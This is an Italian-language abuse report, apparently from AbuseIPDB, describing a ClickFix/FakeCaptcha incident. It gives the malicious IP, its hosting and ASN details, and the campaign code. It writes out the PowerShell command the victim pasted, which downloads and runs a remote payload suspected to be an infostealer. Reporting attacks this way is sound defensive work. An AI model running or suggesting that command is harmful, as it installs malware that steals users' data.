DATI DELL'INCIDENTE ---
IP malevolo: 85.239.149.167
URL completo: http://85.239.149. ...
show more DATI DELL'INCIDENTE ---
IP malevolo: 85.239.149.167
URL completo: http://85.239.149.167/GlRuDKYnemMeVjxA
Data/ora incidente: 15/07/2026 (notte, ~00:13-00:15)
Tipo di attacco: ClickFix / FakeCaptcha - comando PowerShell malevolo
incollato in Esegui (Win+R), scarica ed esegue un
payload remoto (sospetto infostealer).
Comando usato: powershell -c "iex(irm '85.239.149.167/GlRuDKYnemMeVjxA' -UseBasicParsing)"
Codice campagna: #ID-017958154662
--- INFRASTRUTTURA (dati pubblici) ---
Paese hosting: Germania (Francoforte am Main)
Provider: DEDIK Services Limited
ASN: AS207043
show less
Hacking
By clicking “Accept all”, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.